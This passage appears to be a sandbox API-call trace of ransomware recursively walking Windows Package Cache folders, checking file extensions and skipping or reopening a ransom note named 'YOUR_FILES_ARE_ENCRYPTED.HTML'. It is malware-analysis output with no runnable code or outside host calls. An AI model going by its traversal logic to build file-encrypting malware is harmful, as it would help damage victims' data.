| out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*" [0170.098] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc23dd80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc23dd80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.099] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1cebb750, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc23dd80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc23dd80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.099] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x972dc300, ftCreationTime.dwHighDateTime=0x1d287fd, ftLastAccessTime.dwLowDateTime=0x972dc300, ftLastAccessTime.dwHighDateTime=0x1d287fd, ftLastWriteTime.dwLowDateTime=0x972dc300, ftLastWriteTime.dwHighDateTime=0x1d287fd, nFileSizeHigh=0x0, nFileSizeLow=0x9990e, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0170.099] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, 
pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\Windows6.1-KB2999226-x86.msu") returned 125 [0170.099] lstrcmpW (lpString1="Windows6.1-KB2999226-x86.msu", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0170.099] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0170.099] lstrlenW (lpString=".msu") returned 4 [0170.099] PathFindExtensionW (pszPath="Windows6.1-KB2999226-x86.msu") returned=".msu" [0170.099] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc23dd80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc23dd80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.099] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.099] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.099] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc23dd80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc23dd80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 
[0170.099] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0170.099] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 126 [0170.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.100] GetProcessHeap () returned 0x270000 [0170.101] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7690008 | out: hHeap=0x270000) returned 1 [0170.101] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc263ee0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.101] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0170.101] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.101] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: 
lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc263ee0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.101] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0170.101] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0170.101] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\Patch\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\patch\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.101] GetProcessHeap () returned 0x270000 [0170.102] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0170.102] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc263ee0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.102] wnsprintfW (in: 
pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.102] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.102] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc263ee0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.103] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0170.103] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0170.103] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0170.103] GetProcessHeap () returned 0x270000 [0170.104] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0170.104] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc263ee0, 
ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0170.104] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0170.104] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0170.104] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc263ee0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcc263ee0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc263ee0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0170.104] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0170.104] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0170.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\564F02E6419B9858949B0CD5A65E2C8C0944DD88\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\package cache\\564f02e6419b9858949b0cd5a65e2c8c0944dd88\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, 
hTemplateFile=0x0) returned 0xffffffff [0170.104] GetProcessHeap () returned 0x270000 [0170.105] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa010 | out: hHeap=0x270000) returned 1 [0170.111] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87c35b0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2d6300, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="D4036846864773E3D647F421DFE7F6CA536E307B", cAlternateFileName="D40368~1")) returned 1 [0170.112] wnsprintfW (in: pszDest=0x74ea008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B") returned 77 [0170.112] GetProcessHeap () returned 0x270000 [0170.112] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa010 [0170.113] lstrcpyW (in: lpString1=0x74fa010, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B" [0170.113] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*" [0170.114] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, 
ftCreationTime.dwLowDateTime=0x87c35b0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2d6300, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0170.114] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87c35b0, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2d6300, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2d6300, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.115] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0170.115] wnsprintfW (in: pszDest=0x74fa010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages") returned 86 [0170.115] GetProcessHeap () returned 0x270000 [0170.115] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0170.117] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages" [0170.117] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*" [0170.117] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0170.118] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.118] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, 
ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Patch", cAlternateFileName="")) returned 1 [0170.118] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch") returned 92 [0170.118] GetProcessHeap () returned 0x270000 [0170.118] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0170.119] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch" [0170.119] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*" [0170.120] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0170.120] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c 
| out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.120] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="x86", cAlternateFileName="")) returned 1 [0170.120] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86") returned 96 [0170.120] GetProcessHeap () returned 0x270000 [0170.120] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7690008 [0170.123] lstrcpyW (in: lpString1=0x7690008, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86" [0170.123] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*") 
returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*" [0170.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\D4036846864773E3D647F421DFE7F6CA536E307B\\packages\\Patch\\x86\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0170.123] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87e9710, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0xcc2b01a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc2b01a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0170.123] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7584c900, ftCreationTime.dwHighDateTime=0x1d0a14b, ftLastAccessTime.dwLowDateTime=0x7584c900, ftLastAccessTime.dwHighDateTime=0x1d0a14b, ftLastWriteTime.dwLowDateTime=0x7584c900, ftLastWriteTime.dwHighDateTime=0x1d0a14b, nFileSizeHigh=0x0, nFileSizeLow=0x98303, dwReserved0=0x0, dwReserved1=0x60, cFileName="Windows6.1-KB2999226-x86.msu", cAlternateFileName="WINDOW~1.MSU")) returned 1 [0170.123] wnsprintfW (in: pszDest=0x7690008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
